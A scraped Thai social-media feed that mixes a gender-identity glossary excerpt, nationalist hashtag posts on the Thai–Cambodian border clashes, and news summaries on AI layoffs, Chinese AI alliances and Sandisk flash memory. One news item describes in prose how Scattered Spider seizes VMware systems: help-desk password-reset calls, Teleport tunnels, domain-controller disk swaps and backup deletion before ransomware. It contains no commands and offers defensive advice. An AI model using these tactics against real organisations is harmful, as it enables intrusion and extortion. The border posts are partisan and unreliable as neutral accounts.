H.A. Burnham in the 1990s. The origin of neutrois is unclear, but it is likely related to the French neutre, meaning “neuter, neither masculine nor feminine,” and trois, “three,” a reference to it representing a third gender. aporagender Another nonbinary gender identity is aporagender. Aporagender is distinct from male, female, or any gender along the binary spectrum, but still involves experiencing a strong gender identity. Like xenogender identities, aporagender identities are connected to an identity beyond a binary. This makes aporagender people different from neutrois people in that they have a gender identity. The word aporagender is thought to have been coined in 2014 by a user of the website Tumblr. The apora- part of the word comes from the Greek apó, meaning “away off, apart,” or “separate.” In other words, aporagender is a “separate gender,” neither male nor female nor anything in between. maverique Like aporagender, maverique was coined in 2014 by a Tumblr user, Vesper H., who defines the term on their FAQ page as an “inner conviction regarding a sense of self that is entirely independent of male/masculinity, female/femininity or anything which derives from the two while still being neither without gender, nor of a neutral gender.” In this way, a maverique gender is said to be unique and separate from the gender binary. The term comes from a combination of the English maverick, referring to someone who is “unorthodox” or “nonconformist,” and the French suffix -ique, meaning “having some characteristics of” or “-like,” similar to the English -ic. Maverique can be pronounced either [ mav-reek ] or [ mav-uh–reek ]. gendervoid Another set of gender identities that falls under the nonbinary umbrella is gendervoid, referring to the sense that there is “an empty space,” a void, where a gender identity would be. Those who identify as gendervoid may feel unable to experience gender. When describing gender identity, void- can also be used as a prefix, as in voidboy or voidgirl, which are used for a person who identifies with some aspect of masculinity or femininity while also experiencing a gender “void.” The term is sometimes used synonymously with agender, but some make the distinction that agender represents gender neutrality while gendervoid represents a complete lack of gender. māhū Within Native Hawaiian and Tahitian cultures, the gender identity said to be between male and female is known as māhū [ ma-hoo ]. Traditionally, māhū people were highly respected in their communities for their knowledge of rituals and healing practices. While historically māhū people have faced marginalization and discrimination, there is growing recognition of them and their contributions to the life and culture of their communities. hijra While there is a variety of third genders in many cultures throughout the Indian subcontinent, one of the more common ones is hijra [ hij–ruh ], referring to “a person whose gender identity is neither male nor female, typically a person who was assigned male at birth but whose gender expression is female.” It can also more generally refer to a transgender person. Members of the hijra community often live apart from other communities. Believed by many Hindus to have particular religious power due to their gender, the hijra are often hired to perform dances and blessings at momentous occasions, such as weddings and births. fa’afafine and fa’afatama In Samoan culture, both in Samoa and in Samoan communities around the world, the terms fa’afafine [ fa-af-ah-feen-eh ] and fa’afatama [ fa-af-ah–tah-mah ] are used to refer to those who express both masculine and feminine gender characteristics. Fa’afafine refers to a person assigned male at birth with female characteristics, while fa’afatama refers to a person assigned female at birth with male characteristics. The prefix fa’a- means “in the manner of,” while fafine means “woman” and fatama means “man.” Fa’afafine and fa’afatama people are particularly noted for their role as a ceremonial host—or taupou—during rituals. It is important to note that māhū, hijra, fa’afafine, and fa’afatama are connected to specific cultural conceptions of gender and, as such, are not directly analogous to each other or other terms used by transgender people. These are only a few of the many terms you may encounter in the discussion and expression of gender identity. You can find many more in Gender and Sexuality Dictionary, which it regularly update with new terms and meanings to reflect evolving terminology. © 2025, Aakkhra, All rights reserved.
    0 ความคิดเห็น 0 การแบ่งปัน 147 มุมมอง 0 รีวิว
  • คนไทยอุ่นใจ เพราะได้ยินคำนี้จากทูตจีน [31/7/68]
    (Thais feel reassured after hearing these words from the Chinese ambassador.)
    #ทูตจีนพูดแล้ว #จีนหนุนไทย #เสียงจากประชาคมโลก #ข่าวต่างประเทศ #ความมั่นคงชายแดน #Thaitimes #News1 #Shorts #TruthFromThailand #CambodiaNoCeasefire #Hunsenfiredfirst #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด
    คนไทยอุ่นใจ เพราะได้ยินคำนี้จากทูตจีน [31/7/68] (Thais feel reassured after hearing these words from the Chinese ambassador.) #ทูตจีนพูดแล้ว #จีนหนุนไทย #เสียงจากประชาคมโลก #ข่าวต่างประเทศ #ความมั่นคงชายแดน #Thaitimes #News1 #Shorts #TruthFromThailand #CambodiaNoCeasefire #Hunsenfiredfirst #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด
    0 ความคิดเห็น 0 การแบ่งปัน 163 มุมมอง 0 1 รีวิว
  • เรื่องเล่าจากห้องประชุม: เมื่อ AI กลายเป็นดาบสองคมในยุคปลดพนักงาน

    ในปี 2025 หลายบริษัทเทคโนโลยีใหญ่ เช่น Microsoft, Google, Meta, Autodesk, CrowdStrike และ TCS ต่างประกาศปลดพนักงานหลายหมื่นคน โดยมักอ้างว่าเป็นการ “ปรับโครงสร้างเพื่อเข้าสู่ยุค AI” แต่รายงานจาก Indeed และนักเศรษฐศาสตร์กลับชี้ว่า AI ไม่ใช่สาเหตุเดียว—เศรษฐกิจโดยรวมก็ชะลอตัวเช่นกัน

    ซีอีโอหลายคนใช้ “AI pivot” เป็นภาษาสวยหรูในอีเมลปลดพนักงาน เช่น “เรากำลังเข้าสู่ยุคใหม่ของนวัตกรรม” หรือ “AI จะช่วยให้เราทำงานได้เร็วขึ้น” แต่ในความเป็นจริง หลายตำแหน่งถูกตัดเพื่อโยกงบไปลงทุนในศูนย์ข้อมูล ชิป และทีม AI โดยเฉพาะ

    ที่น่ากังวลคือ ตำแหน่งที่ได้รับผลกระทบหนักที่สุดคือ “ระดับเริ่มต้น” เช่น งานด้านการตลาด การช่วยเหลือธุรการ และ HR ซึ่ง AI สามารถทำงานแทนได้ง่าย ส่วนผู้ที่มีทักษะ AI กลับได้รับข้อเสนอเงินเดือนสูงขึ้น และมีโอกาสมากกว่า

    บริษัทเทคโนโลยีทั่วโลกปลดพนักงานหลายหมื่นคนในปี 2025
    Microsoft ปลด 15,000 คน แม้กำไรเพิ่มขึ้น
    TCS ปลด 12,000 คนเพื่อปรับองค์กรสู่ “Future-Ready”
    Autodesk, CrowdStrike, Indeed, Meta และ Google ก็ปลดพนักงานพร้อมเพิ่มงบ AI

    ซีอีโอใช้ “AI pivot” เป็นเหตุผลในการปลดพนักงาน
    อ้างว่า AI จะช่วยเพิ่มประสิทธิภาพและนวัตกรรม
    ใช้ภาษาสวยงามเพื่อปลอบใจพนักงานและสร้างภาพลักษณ์ต่อวอลล์สตรีท

    AI spending เป็นปัจจัยหลักมากกว่าการแทนที่คนโดยตรง
    บริษัทลงทุนมหาศาลในศูนย์ข้อมูล ชิป และทีม AI
    Google เพิ่มงบลงทุนอีก 10 พันล้านดอลลาร์ รวมเป็น 85 พันล้านดอลลาร์

    ตำแหน่งที่ได้รับผลกระทบมากที่สุดคือระดับเริ่มต้น
    งานด้านการตลาด, HR, ผู้ช่วย, และบริการลูกค้า
    งานที่ซ้ำซ้อนและใช้เอกสารเป็นหลักถูกแทนที่ด้วย AI ได้ง่าย

    ตำแหน่งที่มีทักษะ AI กลับได้รับข้อเสนอสูงขึ้น
    ผู้เชี่ยวชาญด้าน machine learning และ prompt engineering มีความต้องการสูง
    Meta เสนอแพ็คเกจเงินเดือนสูงเพื่อดึงตัวนักวิทยาศาสตร์ AI จาก OpenAI

    AI ยังสร้างงานใหม่ในหลายสาขานอกเทคโนโลยี
    งานด้านการตลาด, การศึกษา, การผลิต และบริการลูกค้า
    ทักษะ AI กลายเป็น “สินทรัพย์” ที่เพิ่มเงินเดือนเฉลี่ยถึง $18,000 ต่อปี

    https://www.thestar.com.my/tech/tech-news/2025/07/31/is-ai-causing-tech-worker-layoffs-that039s-what-ceos-suggest-but-the-reality-is-complicated
    🧠 เรื่องเล่าจากห้องประชุม: เมื่อ AI กลายเป็นดาบสองคมในยุคปลดพนักงาน ในปี 2025 หลายบริษัทเทคโนโลยีใหญ่ เช่น Microsoft, Google, Meta, Autodesk, CrowdStrike และ TCS ต่างประกาศปลดพนักงานหลายหมื่นคน โดยมักอ้างว่าเป็นการ “ปรับโครงสร้างเพื่อเข้าสู่ยุค AI” แต่รายงานจาก Indeed และนักเศรษฐศาสตร์กลับชี้ว่า AI ไม่ใช่สาเหตุเดียว—เศรษฐกิจโดยรวมก็ชะลอตัวเช่นกัน ซีอีโอหลายคนใช้ “AI pivot” เป็นภาษาสวยหรูในอีเมลปลดพนักงาน เช่น “เรากำลังเข้าสู่ยุคใหม่ของนวัตกรรม” หรือ “AI จะช่วยให้เราทำงานได้เร็วขึ้น” แต่ในความเป็นจริง หลายตำแหน่งถูกตัดเพื่อโยกงบไปลงทุนในศูนย์ข้อมูล ชิป และทีม AI โดยเฉพาะ ที่น่ากังวลคือ ตำแหน่งที่ได้รับผลกระทบหนักที่สุดคือ “ระดับเริ่มต้น” เช่น งานด้านการตลาด การช่วยเหลือธุรการ และ HR ซึ่ง AI สามารถทำงานแทนได้ง่าย ส่วนผู้ที่มีทักษะ AI กลับได้รับข้อเสนอเงินเดือนสูงขึ้น และมีโอกาสมากกว่า ✅ บริษัทเทคโนโลยีทั่วโลกปลดพนักงานหลายหมื่นคนในปี 2025 ➡️ Microsoft ปลด 15,000 คน แม้กำไรเพิ่มขึ้น ➡️ TCS ปลด 12,000 คนเพื่อปรับองค์กรสู่ “Future-Ready” ➡️ Autodesk, CrowdStrike, Indeed, Meta และ Google ก็ปลดพนักงานพร้อมเพิ่มงบ AI ✅ ซีอีโอใช้ “AI pivot” เป็นเหตุผลในการปลดพนักงาน ➡️ อ้างว่า AI จะช่วยเพิ่มประสิทธิภาพและนวัตกรรม ➡️ ใช้ภาษาสวยงามเพื่อปลอบใจพนักงานและสร้างภาพลักษณ์ต่อวอลล์สตรีท ✅ AI spending เป็นปัจจัยหลักมากกว่าการแทนที่คนโดยตรง ➡️ บริษัทลงทุนมหาศาลในศูนย์ข้อมูล ชิป และทีม AI ➡️ Google เพิ่มงบลงทุนอีก 10 พันล้านดอลลาร์ รวมเป็น 85 พันล้านดอลลาร์ ✅ ตำแหน่งที่ได้รับผลกระทบมากที่สุดคือระดับเริ่มต้น ➡️ งานด้านการตลาด, HR, ผู้ช่วย, และบริการลูกค้า ➡️ งานที่ซ้ำซ้อนและใช้เอกสารเป็นหลักถูกแทนที่ด้วย AI ได้ง่าย ✅ ตำแหน่งที่มีทักษะ AI กลับได้รับข้อเสนอสูงขึ้น ➡️ ผู้เชี่ยวชาญด้าน machine learning และ prompt engineering มีความต้องการสูง ➡️ Meta เสนอแพ็คเกจเงินเดือนสูงเพื่อดึงตัวนักวิทยาศาสตร์ AI จาก OpenAI ✅ AI ยังสร้างงานใหม่ในหลายสาขานอกเทคโนโลยี ➡️ งานด้านการตลาด, การศึกษา, การผลิต และบริการลูกค้า ➡️ ทักษะ AI กลายเป็น “สินทรัพย์” ที่เพิ่มเงินเดือนเฉลี่ยถึง $18,000 ต่อปี https://www.thestar.com.my/tech/tech-news/2025/07/31/is-ai-causing-tech-worker-layoffs-that039s-what-ceos-suggest-but-the-reality-is-complicated
    WWW.THESTAR.COM.MY
    Is AI causing tech worker layoffs? That's what CEOs suggest, but the reality is complicated
    If you read the typical 2025 mass layoff notice from a tech industry CEO, you might think that artificial intelligence cost workers their jobs.
    0 ความคิดเห็น 0 การแบ่งปัน 128 มุมมอง 0 รีวิว
  • สาวไทยในเกาหลี ชี้แจงด้วยภาษาเกาหลี เขมรไม่หยุดยิง!
    (Thai woman in Korea explains in Korean — Cambodia hasn’t stopped firing!) [30/7/68]

    #สาวไทยในเกาหลี #คนไทยในต่างแดนพูดแล้ว #สื่อสารด้วยภาษาเกาหลี #เสียงจากเกาหลีถึงโลก #CambodiaStillAttacking #ThaiVoiceFromKorea #Scambodia #ข่าววันนี้ #ข่าวดัง
    #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #CambodiaNoCeasefire #TruthFromThailand #Hunsenfiredfirst #thaitimes #news1 #shorts
    สาวไทยในเกาหลี ชี้แจงด้วยภาษาเกาหลี เขมรไม่หยุดยิง! (Thai woman in Korea explains in Korean — Cambodia hasn’t stopped firing!) [30/7/68] #สาวไทยในเกาหลี #คนไทยในต่างแดนพูดแล้ว #สื่อสารด้วยภาษาเกาหลี #เสียงจากเกาหลีถึงโลก #CambodiaStillAttacking #ThaiVoiceFromKorea #Scambodia #ข่าววันนี้ #ข่าวดัง #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #CambodiaNoCeasefire #TruthFromThailand #Hunsenfiredfirst #thaitimes #news1 #shorts
    0 ความคิดเห็น 0 การแบ่งปัน 139 มุมมอง 0 0 รีวิว
  • ผบ.สูงสุดมาเลเซียเยือนเขมร สังเกตการณ์เขมรไม่หยุดยิง 2 วันติด มาเลเซียว่าไง?
    (Malaysia’s top commander visits Cambodia, witnesses two days of ongoing fire — what is Malaysia’s stance?) [30/7/68]

    #มาเลเซียเยือนเขมร #ผบสูงสุดมาเลเซีย #สังเกตการณ์หยุดยิงลวง #2วันยังยิงไม่หยุด #MalaysiaObservesCambodia #CambodiaStillFiring #ท่าทีมาเลเซียสำคัญ #ASEANจับตา #ข่าวต่างประเทศ #ข่าวความมั่นคง

    #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #CambodiaNoCeasefire #TruthFromThailand #Hunsenfiredfirst #thaitimes #news1 #shorts
    ผบ.สูงสุดมาเลเซียเยือนเขมร สังเกตการณ์เขมรไม่หยุดยิง 2 วันติด มาเลเซียว่าไง? (Malaysia’s top commander visits Cambodia, witnesses two days of ongoing fire — what is Malaysia’s stance?) [30/7/68] #มาเลเซียเยือนเขมร #ผบสูงสุดมาเลเซีย #สังเกตการณ์หยุดยิงลวง #2วันยังยิงไม่หยุด #MalaysiaObservesCambodia #CambodiaStillFiring #ท่าทีมาเลเซียสำคัญ #ASEANจับตา #ข่าวต่างประเทศ #ข่าวความมั่นคง #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #CambodiaNoCeasefire #TruthFromThailand #Hunsenfiredfirst #thaitimes #news1 #shorts
    0 ความคิดเห็น 0 การแบ่งปัน 142 มุมมอง 0 0 รีวิว
  • เรื่องเล่าจากเซี่ยงไฮ้: เมื่อจีนรวมพลังสร้างระบบ AI แบบครบวงจรในประเทศ

    ในงาน World Artificial Intelligence Conference (WAIC) ที่เซี่ยงไฮ้ จีนได้เปิดตัวสองพันธมิตรอุตสาหกรรมใหม่ ได้แก่:

    1️⃣ Model-Chip Ecosystem Innovation Alliance นำโดย StepFun ร่วมกับผู้ผลิตชิปชั้นนำของจีน เช่น Huawei, Biren, Enflame และ Moore Threads เพื่อสร้างระบบนิเวศที่เชื่อมโยงตั้งแต่ฮาร์ดแวร์ โมเดล AI ไปจนถึงโครงสร้างพื้นฐาน โดยมีเป้าหมายเพื่อพัฒนาเทคโนโลยีแบบ end-to-end ภายในประเทศ

    2️⃣ Shanghai General Chamber of Commerce AI Committee มุ่งเน้นการผลักดันการนำ AI ไปใช้ในภาคอุตสาหกรรม โดยมีสมาชิกเช่น SenseTime, MiniMax, MetaX และ Iluvatar CoreX ซึ่งหลายรายเคยถูกสหรัฐฯ คว่ำบาตรจากการใช้เทคโนโลยีเพื่อการเฝ้าระวัง

    ทั้งสองพันธมิตรมีเป้าหมายร่วมกันคือการสร้างมาตรฐานเทคโนโลยีภายในประเทศ ลดการพึ่งพา GPU จาก NVIDIA และซอฟต์แวร์จากสหรัฐฯ โดยเน้นการพัฒนา API, รูปแบบโมเดล และสแต็กซอฟต์แวร์กลางที่สามารถใช้งานร่วมกันได้ในระบบจีนทั้งหมด

    จีนเปิดตัวสองพันธมิตร AI เพื่อสร้างระบบนิเวศภายในประเทศ
    Model-Chip Ecosystem Innovation Alliance เชื่อมโยงผู้ผลิตชิปและนักพัฒนาโมเดล
    Shanghai AI Committee ผลักดันการใช้ AI ในภาคอุตสาหกรรม

    พันธมิตรแรกประกอบด้วย Huawei, Biren, Enflame, Moore Threads และ StepFun
    มุ่งสร้างระบบเทคโนโลยีครบวงจรตั้งแต่ฮาร์ดแวร์ถึงซอฟต์แวร์
    ลดการพึ่งพา GPU จาก NVIDIA ที่ถูกจำกัดการส่งออก

    พันธมิตรที่สองรวมบริษัทที่เคยถูกคว่ำบาตร เช่น SenseTime และ MiniMax
    เปลี่ยนจากเทคโนโลยีเฝ้าระวังมาเป็น LLM และ AI เชิงอุตสาหกรรม
    เชื่อมโยงนักพัฒนา AI กับผู้ใช้งานในภาคธุรกิจ

    เป้าหมายคือการสร้างมาตรฐานกลาง เช่น API และรูปแบบโมเดลที่ใช้ร่วมกันได้
    ลดความซับซ้อนจากสถาปัตยกรรมที่หลากหลาย เช่น Arm, PowerVR
    ส่งเสริมการพัฒนาโมเดลที่สามารถรันบน accelerator ของจีนทุกค่าย

    Huawei เปิดตัว CloudMatrix 384 ที่ใช้ชิป 910C จำนวน 384 ตัว
    ใช้เทคนิค clustering เพื่อชดเชยประสิทธิภาพชิปเดี่ยว
    มีประสิทธิภาพบางด้านเหนือกว่า NVIDIA GB200 NVL72

    https://www.tomshardware.com/tech-industry/artificial-intelligence/china-forms-ai-alliances-to-cut-u-s-tech-reliance-huawei-among-companies-seeking-to-create-unified-tech-stack-with-domestic-powered-standardization
    🧠 เรื่องเล่าจากเซี่ยงไฮ้: เมื่อจีนรวมพลังสร้างระบบ AI แบบครบวงจรในประเทศ ในงาน World Artificial Intelligence Conference (WAIC) ที่เซี่ยงไฮ้ จีนได้เปิดตัวสองพันธมิตรอุตสาหกรรมใหม่ ได้แก่: 1️⃣ Model-Chip Ecosystem Innovation Alliance นำโดย StepFun ร่วมกับผู้ผลิตชิปชั้นนำของจีน เช่น Huawei, Biren, Enflame และ Moore Threads เพื่อสร้างระบบนิเวศที่เชื่อมโยงตั้งแต่ฮาร์ดแวร์ โมเดล AI ไปจนถึงโครงสร้างพื้นฐาน โดยมีเป้าหมายเพื่อพัฒนาเทคโนโลยีแบบ end-to-end ภายในประเทศ 2️⃣ Shanghai General Chamber of Commerce AI Committee มุ่งเน้นการผลักดันการนำ AI ไปใช้ในภาคอุตสาหกรรม โดยมีสมาชิกเช่น SenseTime, MiniMax, MetaX และ Iluvatar CoreX ซึ่งหลายรายเคยถูกสหรัฐฯ คว่ำบาตรจากการใช้เทคโนโลยีเพื่อการเฝ้าระวัง ทั้งสองพันธมิตรมีเป้าหมายร่วมกันคือการสร้างมาตรฐานเทคโนโลยีภายในประเทศ ลดการพึ่งพา GPU จาก NVIDIA และซอฟต์แวร์จากสหรัฐฯ โดยเน้นการพัฒนา API, รูปแบบโมเดล และสแต็กซอฟต์แวร์กลางที่สามารถใช้งานร่วมกันได้ในระบบจีนทั้งหมด ✅ จีนเปิดตัวสองพันธมิตร AI เพื่อสร้างระบบนิเวศภายในประเทศ ➡️ Model-Chip Ecosystem Innovation Alliance เชื่อมโยงผู้ผลิตชิปและนักพัฒนาโมเดล ➡️ Shanghai AI Committee ผลักดันการใช้ AI ในภาคอุตสาหกรรม ✅ พันธมิตรแรกประกอบด้วย Huawei, Biren, Enflame, Moore Threads และ StepFun ➡️ มุ่งสร้างระบบเทคโนโลยีครบวงจรตั้งแต่ฮาร์ดแวร์ถึงซอฟต์แวร์ ➡️ ลดการพึ่งพา GPU จาก NVIDIA ที่ถูกจำกัดการส่งออก ✅ พันธมิตรที่สองรวมบริษัทที่เคยถูกคว่ำบาตร เช่น SenseTime และ MiniMax ➡️ เปลี่ยนจากเทคโนโลยีเฝ้าระวังมาเป็น LLM และ AI เชิงอุตสาหกรรม ➡️ เชื่อมโยงนักพัฒนา AI กับผู้ใช้งานในภาคธุรกิจ ✅ เป้าหมายคือการสร้างมาตรฐานกลาง เช่น API และรูปแบบโมเดลที่ใช้ร่วมกันได้ ➡️ ลดความซับซ้อนจากสถาปัตยกรรมที่หลากหลาย เช่น Arm, PowerVR ➡️ ส่งเสริมการพัฒนาโมเดลที่สามารถรันบน accelerator ของจีนทุกค่าย ✅ Huawei เปิดตัว CloudMatrix 384 ที่ใช้ชิป 910C จำนวน 384 ตัว ➡️ ใช้เทคนิค clustering เพื่อชดเชยประสิทธิภาพชิปเดี่ยว ➡️ มีประสิทธิภาพบางด้านเหนือกว่า NVIDIA GB200 NVL72 https://www.tomshardware.com/tech-industry/artificial-intelligence/china-forms-ai-alliances-to-cut-u-s-tech-reliance-huawei-among-companies-seeking-to-create-unified-tech-stack-with-domestic-powered-standardization
    0 ความคิดเห็น 0 การแบ่งปัน 124 มุมมอง 0 รีวิว
  • เรื่องเล่าจากเงามืด: เมื่อ Scattered Spider ใช้โทรศัพท์แทนมัลแวร์เพื่อยึดระบบเสมือน

    Scattered Spider เป็นกลุ่มแฮกเกอร์ที่มีชื่อเสียงจากการโจมตีองค์กรใหญ่ เช่น MGM Resorts และ Harrods โดยใช้เทคนิคที่ไม่ต้องพึ่งช่องโหว่ซอฟต์แวร์ แต่ใช้ “social engineering” ผ่านการโทรศัพท์ไปยัง Help Desk เพื่อขอรีเซ็ตรหัสผ่านของบัญชี Active Directory

    เมื่อได้สิทธิ์เข้าระบบแล้ว พวกเขาจะค้นหาข้อมูลภายใน เช่น รายชื่อผู้ดูแลระบบ vSphere และกลุ่มสิทธิ์ระดับสูง แล้วโทรอีกครั้งเพื่อขอรีเซ็ตรหัสของผู้ดูแลระบบ จากนั้นใช้สิทธิ์ที่ได้เข้าไปยึด VMware vCenter Server Appliance (VCSA) และเปิดช่องทาง SSH บน ESXi hypervisor เพื่อควบคุมระบบทั้งหมด

    พวกเขายังใช้เครื่องมือถูกกฎหมายอย่าง Teleport เพื่อสร้างช่องทางสื่อสารแบบเข้ารหัสที่หลบเลี่ยงไฟร์วอลล์ และทำการโจมตีแบบ “disk-swap” โดยปิด VM ของ Domain Controller แล้วถอดดิสก์ไปติดตั้งบน VM ที่ควบคุมเอง เพื่อขโมยฐานข้อมูล NTDS.dit ของ Active Directory

    ก่อนจะปล่อยแรนซัมแวร์ พวกเขายังลบงานสำรองข้อมูลและ snapshot ทั้งหมด เพื่อให้เหยื่อไม่มีทางกู้คืนได้ และสุดท้ายก็เข้ารหัสไฟล์ VM ทั้งหมดจากระดับ hypervisor โดยใช้สิทธิ์ root ผ่าน SSH

    Scattered Spider (UNC3944) ใช้ social engineering เพื่อยึดระบบ VMware vSphere
    เริ่มจากโทรหา Help Desk เพื่อขอรีเซ็ตรหัสผ่านของบัญชี AD
    ใช้ข้อมูลจากการเจาะระบบภายในเพื่อยกระดับสิทธิ์

    กลุ่มนี้ใช้เครื่องมือถูกกฎหมาย เช่น Teleport เพื่อสร้างช่องทางควบคุมแบบเข้ารหัส
    ติดตั้งบน VCSA เพื่อหลบเลี่ยงการตรวจจับจาก firewall และ EDR
    สร้างช่องทางควบคุมระยะไกลแบบถาวร

    เทคนิค “disk-swap” ใช้ในการขโมยฐานข้อมูล Active Directory โดยไม่ถูกตรวจจับ
    ปิด VM ของ Domain Controller แล้วถอดดิสก์ไปติดตั้งบน VM ที่ควบคุม
    ขโมยไฟล์ NTDS.dit โดยไม่ผ่านระบบปฏิบัติการของ VM

    ก่อนปล่อยแรนซัมแวร์ กลุ่มนี้จะลบงานสำรองข้อมูลทั้งหมด
    ลบ backup jobs และ repositories เพื่อป้องกันการกู้คืน
    ใช้ SSH บน ESXi hosts เพื่อเข้ารหัสไฟล์ VM โดยตรง

    Google แนะนำให้เปลี่ยนแนวทางป้องกันจาก EDR เป็น “infrastructure-centric defense”
    เน้นการตรวจสอบระดับ hypervisor และการควบคุมสิทธิ์
    ใช้ MFA ที่ต้าน phishing, แยกโครงสร้างสำรองข้อมูล, และตรวจสอบ log อย่างต่อเนื่อง

    การโจมตีแบบนี้สามารถเกิดขึ้นได้ภายในเวลาไม่กี่ชั่วโมง
    จากการโทรครั้งแรกถึงการเข้ารหัสข้อมูลใช้เวลาเพียงไม่กี่ชั่วโมง
    ทำให้ระบบตรวจจับแบบเดิมไม่ทันต่อเหตุการณ์

    ระบบ VMware ESXi และ VCSA มีช่องว่างด้านการตรวจสอบที่ EDR มองไม่เห็น
    ไม่มี agent รันใน hypervisor ทำให้การโจมตีไม่ถูกตรวจจับ
    ต้องใช้การตรวจสอบ log จากระดับระบบเสมือนโดยตรง

    การใช้ Active Directory ร่วมกับ vSphere เป็นจุดอ่อนสำคัญ
    เมื่อ AD ถูกยึด สิทธิ์ใน vSphere ก็ถูกยึดตามไปด้วย
    ควรแยกโครงสร้างสิทธิ์และใช้ MFA ที่ไม่พึ่ง AD

    Help Desk กลายเป็นจุดเริ่มต้นของการโจมตี
    การรีเซ็ตรหัสผ่านผ่านโทรศัพท์เป็นช่องทางที่ถูกใช้บ่อย
    ควรมีขั้นตอนตรวจสอบตัวตนที่เข้มงวดและห้ามรีเซ็ตบัญชีระดับสูงผ่านโทรศัพท์

    https://hackread.com/scattered-spider-ransomware-hijack-vmware-systems-google/
    🕷️ เรื่องเล่าจากเงามืด: เมื่อ Scattered Spider ใช้โทรศัพท์แทนมัลแวร์เพื่อยึดระบบเสมือน Scattered Spider เป็นกลุ่มแฮกเกอร์ที่มีชื่อเสียงจากการโจมตีองค์กรใหญ่ เช่น MGM Resorts และ Harrods โดยใช้เทคนิคที่ไม่ต้องพึ่งช่องโหว่ซอฟต์แวร์ แต่ใช้ “social engineering” ผ่านการโทรศัพท์ไปยัง Help Desk เพื่อขอรีเซ็ตรหัสผ่านของบัญชี Active Directory เมื่อได้สิทธิ์เข้าระบบแล้ว พวกเขาจะค้นหาข้อมูลภายใน เช่น รายชื่อผู้ดูแลระบบ vSphere และกลุ่มสิทธิ์ระดับสูง แล้วโทรอีกครั้งเพื่อขอรีเซ็ตรหัสของผู้ดูแลระบบ จากนั้นใช้สิทธิ์ที่ได้เข้าไปยึด VMware vCenter Server Appliance (VCSA) และเปิดช่องทาง SSH บน ESXi hypervisor เพื่อควบคุมระบบทั้งหมด พวกเขายังใช้เครื่องมือถูกกฎหมายอย่าง Teleport เพื่อสร้างช่องทางสื่อสารแบบเข้ารหัสที่หลบเลี่ยงไฟร์วอลล์ และทำการโจมตีแบบ “disk-swap” โดยปิด VM ของ Domain Controller แล้วถอดดิสก์ไปติดตั้งบน VM ที่ควบคุมเอง เพื่อขโมยฐานข้อมูล NTDS.dit ของ Active Directory ก่อนจะปล่อยแรนซัมแวร์ พวกเขายังลบงานสำรองข้อมูลและ snapshot ทั้งหมด เพื่อให้เหยื่อไม่มีทางกู้คืนได้ และสุดท้ายก็เข้ารหัสไฟล์ VM ทั้งหมดจากระดับ hypervisor โดยใช้สิทธิ์ root ผ่าน SSH ✅ Scattered Spider (UNC3944) ใช้ social engineering เพื่อยึดระบบ VMware vSphere ➡️ เริ่มจากโทรหา Help Desk เพื่อขอรีเซ็ตรหัสผ่านของบัญชี AD ➡️ ใช้ข้อมูลจากการเจาะระบบภายในเพื่อยกระดับสิทธิ์ ✅ กลุ่มนี้ใช้เครื่องมือถูกกฎหมาย เช่น Teleport เพื่อสร้างช่องทางควบคุมแบบเข้ารหัส ➡️ ติดตั้งบน VCSA เพื่อหลบเลี่ยงการตรวจจับจาก firewall และ EDR ➡️ สร้างช่องทางควบคุมระยะไกลแบบถาวร ✅ เทคนิค “disk-swap” ใช้ในการขโมยฐานข้อมูล Active Directory โดยไม่ถูกตรวจจับ ➡️ ปิด VM ของ Domain Controller แล้วถอดดิสก์ไปติดตั้งบน VM ที่ควบคุม ➡️ ขโมยไฟล์ NTDS.dit โดยไม่ผ่านระบบปฏิบัติการของ VM ✅ ก่อนปล่อยแรนซัมแวร์ กลุ่มนี้จะลบงานสำรองข้อมูลทั้งหมด ➡️ ลบ backup jobs และ repositories เพื่อป้องกันการกู้คืน ➡️ ใช้ SSH บน ESXi hosts เพื่อเข้ารหัสไฟล์ VM โดยตรง ✅ Google แนะนำให้เปลี่ยนแนวทางป้องกันจาก EDR เป็น “infrastructure-centric defense” ➡️ เน้นการตรวจสอบระดับ hypervisor และการควบคุมสิทธิ์ ➡️ ใช้ MFA ที่ต้าน phishing, แยกโครงสร้างสำรองข้อมูล, และตรวจสอบ log อย่างต่อเนื่อง ‼️ การโจมตีแบบนี้สามารถเกิดขึ้นได้ภายในเวลาไม่กี่ชั่วโมง ⛔ จากการโทรครั้งแรกถึงการเข้ารหัสข้อมูลใช้เวลาเพียงไม่กี่ชั่วโมง ⛔ ทำให้ระบบตรวจจับแบบเดิมไม่ทันต่อเหตุการณ์ ‼️ ระบบ VMware ESXi และ VCSA มีช่องว่างด้านการตรวจสอบที่ EDR มองไม่เห็น ⛔ ไม่มี agent รันใน hypervisor ทำให้การโจมตีไม่ถูกตรวจจับ ⛔ ต้องใช้การตรวจสอบ log จากระดับระบบเสมือนโดยตรง ‼️ การใช้ Active Directory ร่วมกับ vSphere เป็นจุดอ่อนสำคัญ ⛔ เมื่อ AD ถูกยึด สิทธิ์ใน vSphere ก็ถูกยึดตามไปด้วย ⛔ ควรแยกโครงสร้างสิทธิ์และใช้ MFA ที่ไม่พึ่ง AD ‼️ Help Desk กลายเป็นจุดเริ่มต้นของการโจมตี ⛔ การรีเซ็ตรหัสผ่านผ่านโทรศัพท์เป็นช่องทางที่ถูกใช้บ่อย ⛔ ควรมีขั้นตอนตรวจสอบตัวตนที่เข้มงวดและห้ามรีเซ็ตบัญชีระดับสูงผ่านโทรศัพท์ https://hackread.com/scattered-spider-ransomware-hijack-vmware-systems-google/
    HACKREAD.COM
    Scattered Spider Launching Ransomware on Hijacked VMware Systems, Google
    Follow us on Bluesky, Twitter (X), Mastodon and Facebook at @Hackread
    0 ความคิดเห็น 0 การแบ่งปัน 124 มุมมอง 0 รีวิว
  • เรื่องเล่าจากวงการชิป: เมื่อ “แฟลช” จะมาแทน “แรม” ในงาน AI

    ลองจินตนาการว่า GPU สำหรับงาน AI ไม่ต้องพึ่ง DRAM แบบ HBM ที่แพงและจำกัดความจุอีกต่อไป แต่ใช้แฟลชความเร็วสูงที่มีความจุระดับ SSD—นั่นคือเป้าหมายของ Sandisk กับเทคโนโลยี HBF (High Bandwidth Flash)

